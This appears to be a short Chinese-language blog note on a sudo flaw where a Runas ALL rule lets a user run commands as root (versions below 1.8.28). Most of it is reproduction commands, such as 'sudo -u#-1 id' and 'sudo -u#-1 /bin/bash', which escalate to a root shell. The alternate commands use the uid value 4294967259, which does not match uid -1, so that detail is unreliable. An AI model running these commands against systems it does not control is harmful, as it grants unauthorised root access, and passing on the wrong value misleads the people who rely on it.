文章目录 漏洞描述影响版本复现 漏洞描述 如果sudo配置允许用户通过Runas规范中定义的ALL关键字来以任意用户身份运行命令,那么攻击者有可能通过制定用户ID以root权限执行恶意命令 影响版本 sudo版本<1.8.28 查看sudo版本命令 sudo -V 复现 前提:需要知道普通账号密码 以root身份执行命令: sudo -u#-1 id 或 sudo -u#4294967259 whoami 以root身份登录: sudo -u#-1 /bin/bash 或 sudo -u#4294967259 /bin/bash